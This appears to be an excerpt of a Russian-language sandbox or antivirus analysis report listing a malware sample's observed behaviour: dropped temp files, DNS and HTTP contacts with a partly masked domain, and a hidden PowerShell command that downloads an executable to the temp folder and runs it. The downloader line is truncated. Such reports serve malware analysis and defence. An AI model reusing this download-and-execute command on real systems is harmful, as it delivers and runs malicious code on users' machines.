Техническая информация
- $arga как %temp%\uhmbzmm.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function fil([String] $arga){(New-Object System.Net.WebClient).DownloadFile($arga,''%TMP%\uhmbzmm.exe'');Start-Process ''%TMP%\uhmbzmm.exe'';}try{fil1(''http://evak...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1904
- %TEMP%\qchbj.bat
- %TEMP%\1116998.cvr
- 'fa###npfau.de':80
- http://fa###npfau.de/guamno.png
- DNS ASK fa###npfau.de
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\qchbj.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function fil([String] $arga){(New-Object System.Net.WebClient).DownloadFile($arga,''%TMP%\uhmbzmm.exe'');Start-Process ''%TMP%\uhmbzmm.exe'';}try{fil1(''http://evak... (со скрытым окном)